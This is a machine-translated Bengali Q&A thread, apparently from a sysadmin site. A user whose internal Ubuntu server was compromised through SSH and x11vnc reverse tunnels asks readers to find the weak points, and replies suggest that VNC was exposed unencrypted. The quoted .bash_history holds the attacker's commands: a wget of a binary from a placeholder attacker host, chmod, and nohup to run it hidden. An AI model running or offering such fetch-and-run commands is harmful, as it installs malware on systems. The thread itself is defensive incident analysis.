Ssh টানেল এবং এক্স 11 সার্ভারের দুর্বল পয়েন্টগুলি, হ্যাক তদন্ত


0

তো, আজ আমাকে হ্যাক করা হয়েছে । এটি কীভাবে হয়েছিল তা আমার কাছে খুব আশ্চর্যজনক, তাই আমি আমার সিস্টেমগুলির নকশায় দুর্বল পয়েন্টগুলি দেখানোর জন্য অভিজ্ঞ ব্যক্তিদের সন্ধান করছি।

আমার দুটি সার্ভার রয়েছে। একটি হ'ল ইন্টারনেটের সাথে সংযোগের সাথে ভিপিএস ( সার্ভার 1 ), দ্বিতীয়টি হ'ল প্রাইভেট নেটওয়ার্কের মধ্যে সার্ভার (সার্ভার 2 ), এসএস রিভার্স টানেলের মাধ্যমে প্রথমটির সাথে সংযুক্ত, 22 (এসএসএস) এবং 5900 (x11vnc) ইন্টারনেটে এক্সপোজ করে। উভয় সার্ভারই উবুন্টু 14.04

আমি এই কমান্ডগুলি ssh বিপরীত টানেল তৈরি করতে ব্যবহার করি (সার্ভার 2 এ):

autossh -fR \*:4202:localhost:22 -N root@server1.com
autossh -fR \*:5900:localhost:5900 -N root@server1.com

আমার সার্ভারগুলিতে এসএসএইচ কনফিগারেশন সম্পর্কে আরও কিছু সুনির্দিষ্ট।

server1

  1. রুট লগইন অনুমতি দেয়
  2. এই লাইন আছে:

    গেটওয়েপোর্টস ক্লায়েন্টস্পাইফাইড

সম্পূর্ণ কনফিগারেশন

সার্ভার 2 #

  1. রুট লগইন অনুমতি দেয় না।
  2. ডিফল্ট (স্টক) ssh কনফিগারেশন ব্যবহার করে
  3. আমি 9 টি অক্ষরের পাসওয়ার্ড সহ সাধারণ (ব্যাটম্যান সম্পর্কিত :) ব্যবহারকারীর নাম ব্যবহার করি।

সম্পূর্ণ কনফিগারেশন

X11 হিসাবে , আমি এই কমান্ডটি x11vnc সার্ভার তৈরি করতে ব্যবহার করি:

/usr/bin/x11vnc -dontdisconnect -notruecolor -noxfixes -shared -forever -rfbport 5900 -bg -o /home/{username}/.vnc/x11vnc.log -rfbauth /home/{username}/.vnc/passwd -auth /var/lib/mdm/:0.Xauth

ভিএনসির জন্য আমার পাসওয়ার্ডটি বেশ ভাল।

সার্ভার 1 সক্রিয়ভাবে আঘাত হানা হচ্ছে , তবে এটির সাথে আপোস করার কোনও প্রমাণ আমার কাছে নেই।

আপনি সার্ভার 1 থেকে পাসওয়ার্ড ছাড়াই সার্ভার 2 অ্যাক্সেস করতে পারবেন না।

হ্যাক করা হলো!

সুতরাং, আজ আমি এটি সার্ভার 2 এ আমার .Bash_historyপেয়েছি :

wget http://{HACKER_IP}:8080/heng
chmod 0755 /root/heng
chmod 0755 ./heng
/dev/null 2>&1 &
nohup ./heng > /dev/null 2>&1 &

32 HACKER_IP ভার্চুয়ালটোটাল দ্বারা উইন 32. রমনিট বিতরণ করে বলে রিপোর্ট করা হয়েছে ।

/var/log/auth.log পরিষ্কার।

হেনগ প্রক্রিয়াটি আমার স্মৃতির ভিতরে ছিল কিন্তু ডিস্কে ছিল না। আমি আমার সিস্টেমটি বন্ধ করে দিয়েছি যাতে আমার আর এটি না হয়।

আমার কনফিগারেশন এবং ব্যবহারের সম্ভাব্য দুর্বল পয়েন্টগুলি:

  1. পাসওয়ার্ডগুলি এক পর্যায়ে স্কাইপের মাধ্যমে সঞ্চারিত হয়েছিল।
  2. আমি এক্সশেল ব্যবহার করি এবং আমি আমার সংযোগগুলিতে পাসওয়ার্ড সংরক্ষণ করতে পাসওয়ার্ড ম্যানেজার ব্যবহার করি।
  3. আমি প্রায়শই সর্বজনীন WI-FI ব্যবহার করি ।

আমি ভুল হয়ে যেতে পারে যেখানে ?

এটি কীভাবে সম্ভব যে সার্ভার 2 এর আগে সার্ভার 2 এর সাথে আপোস করা হচ্ছে ? এটি স্ট্যান্ডার্ড 4202 বন্দরে বসবাস করে এবং বেশ ভাল লগইন / পাসওয়ার্ড সংমিশ্রণ ব্যবহার করে।

ভবিষ্যতে আমি কীভাবে এড়াতে পারি?


সার্ভার 1 কোন ইন্টারনেট মুখোমুখি পরিষেবাগুলি চালায়?
ব্যবহারকারী 619714

রেপো থেকে স্থিতিশীল
এনগিনেক্স

এনগিনেক্স কী পরিবেশন করছে, এটি কোন প্রযুক্তি ব্যবহার করছে?
ব্যবহারকারী 619714

এটি ডিফল্ট ইনস্টলেশন, কেবলমাত্র html ফাইলগুলি। আমার এখানে কোনও ওয়েবসাইট নেই। এটি একটি পরিষ্কার ইনস্টলেশন। এনগিনেক্স সবেমাত্র ইনস্টল করা আছে, এটি আসলে কোনও অভিব্যক্তিটি পরিবেশন করে না
twoface88

আপনার x11vnc এর সংস্করণটি কী?
LScarpinati

উত্তর:


-2

আপনার সেটআপ থেকে আমি যতদূর বলতে পারি, ভিএনসি ট্র্যাফিক এনক্রিপ্ট করা হয়নি। সার্ভার 2 এ সেশনটি কীলগ করা সহজ ছিল। দেখা:

http://vncspy.sourceforge.net/


2
নাঃ। ওএস একটি এসএসএইচ টানেলের মাধ্যমে সংযুক্ত।
EEAA

উদ্বোধনকালে ওপি "ইন্টারনেটে 22 (এসএসএস) এবং 5900 (x11vnc) এক্সপোজিং পোর্ট" বলে জানিয়েছে যা এসএসএস টানেলটি স্থাপনের বিষয়টি বিবেচনা করে একটি খারাপ ধারণা বলে মনে হচ্ছে।
robbie.huffman
আমাদের সাইট ব্যবহার করে, আপনি স্বীকার করেছেন যে আপনি আমাদের কুকি নীতি এবং গোপনীয়তা নীতিটি পড়েছেন এবং বুঝতে পেরেছেন ।
Licensed under cc by-sa 3.0 with attribution required.